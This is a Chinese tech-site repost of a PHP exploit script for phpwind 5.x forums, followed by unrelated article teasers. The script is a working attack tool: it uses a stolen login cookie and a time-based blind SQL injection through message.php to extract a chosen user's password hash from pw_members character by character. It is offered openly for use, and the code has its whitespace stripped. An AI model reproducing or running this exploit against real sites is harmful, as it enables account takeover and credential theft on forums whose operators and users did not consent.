phpwindexp.php,phpwind Exp 漏洞利用

phpwind Exp 漏洞利用

2021-01-23 12:07:25644

忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来.

程序代码

print_r("

+------------------------------------------------------------------+

ExploitForPhpwind5.XVersion

BYLoveshell

JustForFun:)

+------------------------------------------------------------------+

");

ini_set("max_execution_time",0);

error_reporting(7);

$bbspath="$argv[2]";

$server="$argv[1]";

$cookie='1ae40_lastfid=0;1ae40_ol_offset=776;1ae40_ck_info=%2F%09.72m.net;1ae40_winduser=A1QKBgE9UFxUUwAHDloFUAMIAFxeUgIMWgFUVVYDAA8HBFQNUVA%3D;1ae40_lastvisit=0%091173612527%09%2Fbbs%2Findex.php%3F;

$useragent="Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1)";

$uid=intval($argv[3])>0?intval($argv[3]):1;

echo"\r\n#Logging\t........";

if(islogin())echo"LoginOk!\r\n";

elsedie("NotLogin!\tCheckYourCookieandUseragent!\r\n");

echo"#Testing\t........";

if(test())echo"Vul!\r\n";

elsedie("NotVul");

$hashtable='0123456789abcdef';

$count=0;

echo"#Cracking\t\r\n\r\n";

for($i=1;$i<=16;$i++){

echo"第\t$i\t位:";

$subpass=crack($i+8);

$password=$password.$subpass;

echo"$subpass\r\n";

}

echo"Password:\t$password";

echo"\r\nGoodLuck$countTimes\r\n";

functionsend($cmd,$path)

{

global$bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;

$path=$bbspath."$path";

$message="POST".$path."HTTP/1.1\r\n";

$message.="Accept:*/*\r\n";

$message.="Accept-Language:zh-cn\r\n";

$message.="Referer:http://".$server.$path."\r\n";

$message.="Content-Type:application/x-www-form-urlencoded\r\n";

$message.="User-Agent:".$useragent."\r\n";

$message.="Host:".$server."\r\n";

$message.="Content-length:".strlen($cmd)."\r\n";

$message.="Connection:Keep-Alive\r\n";

$message.="Cookie:".$cookie."\r\n";

$message.="\r\n";

$message.=$cmd."\r\n";

$count=$count+1;

$fd=fsockopen($server,80);

fputs($fd,$message);

$resp="

";

while($fd&&!feof($fd)){

$resp.=fread($fd,1024);

}

fclose($fd);

$resp.="

";

if($debug){echo$cmd;echo$resp;}

//echo$resp;

return$resp;

}

functionsqlject($sql){

global$uid;

$data='action=pubmsg&readmsg=0)';

$data=$data."unionselectBENCHMARK(1000000,md5(12345))frompw_memberswhereuid=$uidand$sql".'/*';

$echo=send($data,'message.php');

preg_match("/Total(.*)\(/i",$echo,$matches);

if($matches[1]>2)return1;

elsereturn0;

}

functiontest(){

global$uid;

$data='action=pubmsg&readmsg=0)';

$echo=send($data,'message.php');

if(strpos($echo,'MySQLServerError'))return1;

elsereturn0;

}

functionislogin(){

global$uid;

$data='action=pubmsg&readmsg=0)';

$echo=send($data,'message.php');

if(strpos($echo,'login.php"'))return0;

elsereturn1;

}

functioncrack($i){

global$hashtable;

$sql="mid(password,$i,1)>0x".bin2hex('8');

if(sqlject($sql)){

$a=8;

$b=15;}

else{

$a=0;

$b=8;

}

for($tmp=$a;$tmp<=$b;$tmp++){

$sql="mid(password,$i,1)=0x".bin2hex($hashtable[$tmp]);

if(sqlject($sql))return$hashtable[$tmp];

}

crack($i);

}

?>

点击下载此文件

点击这里复制本文地址

以上内容由聚米学院网友整理呈现,如对侵犯您的权益,请联系邮箱:fzsbm@qq.com

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/485671.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

JSP页面元素,内置对象及request详解

JSP的页面元素&#xff1a; a. 脚本Scriptlet 1.<% 局部变量&#xff0c;Java语句 %> 2.<%! 全局变量&#xff0c;定义方法 %> 3.<% 输出表达式 %> 一般而言&#xff0c;修改web.xml&#xff0c;配置文件&#xff0c;Java&#xff0c;需要重启tomcat服务&am…

生活经验

如果把插上耳机的手机放在衣服口袋里面&#xff0c;特别是大的衣服口袋&#xff0c;手机还能来回动。这个时候耳机很容易团成一团&#xff0c;极容易把线折断。 转载于:https://www.cnblogs.com/bakblog/p/9294753.html

美国科学院报告《无止境的前沿:科学的未来75年》

来源&#xff1a;科技咨询频道作者&#xff1a;刘昊 张志强 曹玲静编译&#xff1a;刘昊 张志强 曹玲静 &#xff08;中国科学院成都文献情报中心&#xff09;2020年12月17日&#xff0c;美国国家科学院出版报告《无止境的前沿——科学的未来75年》&#xff08;The Endless Fro…

jsp内置对象--response

response&#xff1a;响应对象 提供的方法&#xff1a;void addcookie(Cookie cookie);服务端向客户端增加一个cookie对象 void sendRedirect(String location) throws IOException:页面跳转的一种方式&#xff08;重定向&#xff09; void setContetType(String type) :设置…

php获取外部URL,使用PHP从外部API / URL获取信息

1)不要使用file_get_contents()(如果可以帮助的话)这是因为您需要enable fopen_wrappers才能使file_get_contents()能够处理外部源.有时这是关闭的(取决于您的主机;如共享主机),因此您的应用程序将会中断.一般来说,一个很好的选择是curl()2)使用curl()执行GET请求这很简单.使用…

AR增强现实技术解读

来源&#xff1a;网络 AR增强现实&#xff0c;是用户对现实世界感知的新技术。一般认为&#xff0c;AR技术的出现源于虚拟现实技术&#xff08;Virtual Reality&#xff0c;简称VR&#xff09;的发展&#xff0c;但二者存在明显的差别。传统VR技术给予用户一种在虚拟世界中完全…

Leetcode--343. 整数拆分

给定一个正整数 n&#xff0c;将其拆分为至少两个正整数的和&#xff0c;并使这些整数的乘积最大化。 返回你可以获得的最大乘积。 示例 1: 输入: 2 输出: 1 解释: 2 1 1, 1 1 1。 示例 2: 输入: 10 输出: 36 解释: 10 3 3 4, 3 3 4 36。 说明: 你可以假设 n 不小…

php点链接直接现在文件吗,PHP实现点击a标签的href做链接时,直接保存文件(任何类型),而...

一、 index.php中&#xff1a; ?php echo a hrefprocess.php?filenamehalo.mp3下载/a? process.php中&#xff1a; ?php header(Content-type: application/octet-stream);header(Content-Disposition: attachment; filename. basename($_GET[filename]).);header(Cont一、…

人工智能十年回顾:CNN、AlphaGo、GAN……它们曾这样改变世界

来源&#xff1a;机器学习研究组订阅号过去十年间&#xff0c;人工智能技术突飞猛进&#xff0c;最疯狂的科幻小说场景现在已经成为我们生活中不可或缺的一部分。十年前&#xff0c;人们在谈论 AI 的理论化和实验&#xff0c;但这些年来&#xff0c;AI 变得更加切实了&#xff…

Falsy Bouncer-freecodecamp算法题目

Falsy Bouncer&#xff08;过滤数组假值&#xff09; 要求 删除数组中的所有假值。&#xff08;在JavaScript中&#xff0c;假值有false、null、0、""、undefined 和 NaN。&#xff09;思路 用.filter()剔除数组中的假值利用Boolea设置callback函数遇到真值返回true代…

jsp--cookie

cookie&#xff08;客户端&#xff0c;不是内置对象&#xff09;:Cookies是服务端生成的&#xff0c;再发送给客户端保存 相当于本地缓存的作用&#xff1a; 客户端->服务端 eg&#xff1a;看一个电影&#xff0c;服务端产生发给客户端&#xff0c;第二次看就快了 作用&a…

php的declare,php 中的declare

测试代码&#xff1a;function profile(){global $tmp;printf("Now tmp is %d.\n",$tmp);}register_tick_function("profile");declare(ticks3) {$tmp 1;$tmp 2;$tmp 3;$tmp 4;$tmp 5;$tmp 6;$tmp 7;$tmp 8;$tmp 9;$tmp 10;$tmp 11;//unregiste…

Python学习笔记——GIF倒放处理

自动读取指定路径下所有gif格式的文件&#xff0c;利用Python图像处理库PIL下的Image、ImageSequence模块&#xff0c;批量实现gif倒放处理并保存。代码如下&#xff1a;# encoding: utf-8 import os import sys from PIL import Image, ImageSequencepath sys.path[0] …

OpenAI发布新人工智能系统:根据文字生成图像

来源&#xff1a;新浪科技据报道&#xff0c;旧金山人工智能研究公司OpenAI已经开发了一种新系统&#xff0c;能根据短文本来生成图像。OpenAI在官方博客中表示&#xff0c;这个新系统名为DALL-E&#xff0c;名称来源于艺术家萨尔瓦多达利&#xff08;Salvador Dali&#xff09…

jsp内置对象--session

session&#xff08;服务端&#xff09; session&#xff1a;会话 1. 浏览网站&#xff1a;开始->关闭 2. 购物&#xff1a;浏览&#xff0c;结算&#xff0c;付款&#xff0c;退出 3. 电子邮件&#xff1a; 浏览&#xff0c;写邮件&#xff0c;退出 以上都是session的…

python深拷贝实现原理,js递归实现深拷贝

经过小编之前关于JavaScript深拷贝实现方式的介绍&#xff0c;大家已经知道深拷贝能够实现真正意义上的数组和对象的拷贝。其实使用内置对象JSON虽然简答&#xff0c;但不能将对对象的方法深拷贝&#xff0c;因此使用递归的方式就是最实用的&#xff0c;本文介绍使用递归的方式…

梅宏院士:操作系统变迁有20年周期律,泛在计算是一片新蓝海

梅宏来源&#xff1a;观察者网作者&#xff1a;梅宏院士中国科学院院士、发展中国家科学院院士、欧洲科学院外籍院士、IEEE FELLOW&#xff0c;中国计算机学会理事长&#xff0c;北京大学信息技术高等研究院智能软件技术与应用研究中心首席科学家。信息技术发展正在进入人机物融…

session与cookie的区别

1. session保存在服务端&#xff0c;cookie保存在客户端 2. 安全性&#xff1a;session保存在服务端较为安全&#xff0c;cookie保存在客户端&#xff0c;所以较不安全 3. 保存的内容&#xff1a;session保存的是Object&#xff0c;cookie中保存的都是字符串 4.session是内置…

python输出字典的前十项,从字典列表中获取前5个值?

我从api密钥获取json。这是我的json:{[{"count":27,"stem":"obama","term":"obama"},{"count":20,"stem":"boehner","term":"boehner"},{"count":4,"ste…

IEEE CS:2021年的12大技术趋势

来源&#xff1a;笑看国际风云LOS ALAMITOS, Calif., 16 December 2020 – IEEE计算机协会&#xff08;IEEE CS&#xff09;公布了其2021技术预测报告&#xff08;2021 Technology Predictions&#xff09;&#xff0c;重点关注大流行对人类生活&#xff0c;供应链&#xff0c;…